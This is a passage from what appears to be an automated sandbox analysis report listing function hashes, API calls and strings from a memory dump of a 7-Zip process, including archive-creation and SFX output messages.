                                                                                                                                                                                                • Instruction Fuzzy Hash: A021986221594051CE20EF24E851B5EA720EBC67D4F945221FBAE877B9DF28C6C6C700
                                                                                                                                                                                                Function 009864C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$fputc
                                                                                                                                                                                                • String ID: Time =
                                                                                                                                                                                                • API String ID: 1185151155-458291097
                                                                                                                                                                                                • Opcode ID: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
                                                                                                                                                                                                • Instruction ID: 4f3b6ab4203ba04a190c210efbc650ede91a65070d1eb499999e310d3942acc4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
                                                                                                                                                                                                • Instruction Fuzzy Hash: 36217295340A1595FA08BF2AED5535A5326A799FC4F08F036DE1E0B7AADD38C856C340
                                                                                                                                                                                                Function 0097F69C Relevance: 8.8, APIs: 7, Instructions: 66COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 202075352-0
                                                                                                                                                                                                • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                • Instruction ID: 82618ff218b0d59b7a43d4c16f9bbaac46afb08e367ce67139ebf8eee1de9373
                                                                                                                                                                                                • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B21C17322069487CB64EF26D85176C3320F785BE5F905326EE2D176A9DF39C886CB40
                                                                                                                                                                                                Function 0096D078 Relevance: 8.8, APIs: 7, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                • Instruction ID: 7693066e94fe067d09ef7ee6ca714d9ac03285c6b407598851145427e5443543
                                                                                                                                                                                                • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 06111E237069C485CB15EF36D851B692360FBCAFA8F584271AF6D577A9CE24C887C314
                                                                                                                                                                                                Function 009694A8 Relevance: 8.8, APIs: 7, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                • Instruction ID: fa7605b8f9e4435287007af44a601312d169ea1fc9a1fc56612d2d9612e5b084
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F0182237059D0898B25AF26D8516686329BFD9FE47590225FF2D1B359DE30C8828340
                                                                                                                                                                                                Function 0097ECDC Relevance: 8.8, APIs: 7, Instructions: 53COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                • Instruction ID: 9b1914450d47b549c7ee35345ff799efa17afe0793d3dd7932878dd1c989e035
                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                • Instruction Fuzzy Hash: BA111B2374698085CA24AF35D851B6D2364FBCBFE4F588271AF6D5B7A9CE24C886C350
                                                                                                                                                                                                Function 00986B3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 00986B7C
                                                                                                                                                                                                  • Part of subcall function 00946618: FormatMessageW.KERNEL32 ref: 00946676
                                                                                                                                                                                                  • Part of subcall function 00946618: LocalFree.KERNEL32 ref: 00946698
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 0094237E
                                                                                                                                                                                                  • Part of subcall function 00942320: fputs.MSVCRT ref: 009423B8
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 009423C4
                                                                                                                                                                                                  • Part of subcall function 00942300: fputc.MSVCRT ref: 00942311
                                                                                                                                                                                                • free.MSVCRT ref: 00986BAE
                                                                                                                                                                                                • fputs.MSVCRT ref: 00986BCC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputsfree$FormatFreeLocalMessagefputc
                                                                                                                                                                                                • String ID: : $----------------
                                                                                                                                                                                                • API String ID: 1215563195-4071417161
                                                                                                                                                                                                • Opcode ID: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
                                                                                                                                                                                                • Instruction ID: c2ec13c04955792c07dc8cb42b3636b794db1741e5f6e58dda3f63a2be25a7f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
                                                                                                                                                                                                • Instruction Fuzzy Hash: E901847270490585DA20EF26E990B2E3321F7C9FE8F549226EE6E077A5CF38C846C700
                                                                                                                                                                                                Function 0098430C Relevance: 8.8, APIs: 7, Instructions: 40COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                • Instruction ID: ee5294a3b69a03b143254b1c166bd698abf4b369f812421ca898fbcedbed8506
                                                                                                                                                                                                • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                • Instruction Fuzzy Hash: B8F0311371589085CB19BF36DD5166C2364BFDAFD47594162BF1D5B355DE20C8938380
                                                                                                                                                                                                Function 0098BCA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BCD4
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 0094237E
                                                                                                                                                                                                  • Part of subcall function 00942320: fputs.MSVCRT ref: 009423B8
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 009423C4
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BD17
                                                                                                                                                                                                  • Part of subcall function 00942300: fputc.MSVCRT ref: 00942311
                                                                                                                                                                                                • free.MSVCRT ref: 0098BD2B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputsfree$fputc
                                                                                                                                                                                                • String ID: : $Write SFX:
                                                                                                                                                                                                • API String ID: 3584323934-2530961540
                                                                                                                                                                                                • Opcode ID: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
                                                                                                                                                                                                • Instruction ID: e65903117bffe58394b6bf7238ee34343aaeb146a2d3f787a18fc55220eeff8a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
                                                                                                                                                                                                • Instruction Fuzzy Hash: C301F4A230494080DA20EF65E85475E5331FBD9FF8F48D631AE6E477A9DE28C58AC710
                                                                                                                                                                                                Function 0098BB18 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BB49
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BB76
                                                                                                                                                                                                  • Part of subcall function 00942568: free.MSVCRT ref: 009425B5
                                                                                                                                                                                                  • Part of subcall function 00942568: free.MSVCRT ref: 009425C0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputsfree
                                                                                                                                                                                                • String ID: Creating archive: $StdOut$Updating archive:
                                                                                                                                                                                                • API String ID: 2581285248-1319951512
                                                                                                                                                                                                • Opcode ID: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
                                                                                                                                                                                                • Instruction ID: 7a9502c45dda446e9935ef565586d3ab489c65d6b8aaf5bf52fd1033003b6d10
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
                                                                                                                                                                                                • Instruction Fuzzy Hash: EEF012A5311A4581DE05DF2AD99476D6321BB49FD4F4CD4369D0E4B719DF2CC4998310
                                                                                                                                                                                                Function 0094ECDC Relevance: 8.8, APIs: 7, Instructions: 21COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                • Instruction ID: 6d695add6750b660ee7c38df7004524a7f1d48248b8631cc60a033da81154c94
                                                                                                                                                                                                • Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BE0E01261844481DB18FF76DC9162C33A4FFDDF447541451BF2D4B325CD14C8D28384
                                                                                                                                                                                                Function 00953F0C Relevance: 7.7, APIs: 6, Instructions: 191COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                • Instruction ID: c50d98cbf274ac68a29cb3a9fc0f2c5969acd1619bdd34421efb56ebd5b759d2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                • Instruction Fuzzy Hash: 98814573305AC085CB14EF2AD8806AD73A6F789FD9F584122DE590BB69CF34C88AC311
                                                                                                                                                                                                Function 0096E954 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Q
                                                                                                                                                                                                • API String ID: 0-3463352047
                                                                                                                                                                                                • Opcode ID: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                • Instruction ID: 80ec9f03588f9567d0120f027d0385c6275064f1e2afd67bf796459d40c8f219
                                                                                                                                                                                                • Opcode Fuzzy Hash: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 99616376318A84C2CB20DF26E48066EB765F7C8B94F549612FB9B57768DF78C885CB00
                                                                                                                                                                                                Function 009588EC Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 138COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID: act:$ cpus:$ gran:$ page:
                                                                                                                                                                                                • API String ID: 1294909896-454015223
                                                                                                                                                                                                • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                • Instruction ID: d828bb2ad9a46f79edfe979b27a19842da8b7b00f7b7121cd454ac2ca9632540
                                                                                                                                                                                                • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                • Instruction Fuzzy Hash: ED51046530160292DE28EB16E9607AA2321FBC97D0FC49132EE1A0BB99DF78C599C300
                                                                                                                                                                                                Function 00950160 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 123COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 009501D7
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 009502EA
                                                                                                                                                                                                  • Part of subcall function 0094FD30: _CxxThrowException.MSVCRT ref: 0094FE50
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 0095031F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • There is no second file name for rename pair:, xrefs: 00950302
                                                                                                                                                                                                • Empty file path, xrefs: 009502CD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrow$free
                                                                                                                                                                                                • String ID: Empty file path$There is no second file name for rename pair:
                                                                                                                                                                                                • API String ID: 3129652135-1725603831
                                                                                                                                                                                                • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                • Instruction ID: 945b69943eceb70feab1b79f780b842eeabfb164f7fdc79fecde2b6cb6a2733a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6541B272208684C5CA30EB1AE89079E7B60F3D67B4F504712EEB9077E9DB39C589CB41
                                                                                                                                                                                                Function 009603BC Relevance: 7.6, APIs: 5, Instructions: 108COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorFileLastSecurity
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 555121230-0
                                                                                                                                                                                                • Opcode ID: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                • Instruction ID: dfe1e57faf1227d45feb5fed879e8329615dd677ffbd0ebf96692ccd0cf20c6c
                                                                                                                                                                                                • Opcode Fuzzy Hash: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                • Instruction Fuzzy Hash: 57418D33300A9496C760CF26E8847AA73AAF3C5B98F594135DF5A8B724EF34C886C751
                                                                                                                                                                                                Function 0097E580 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
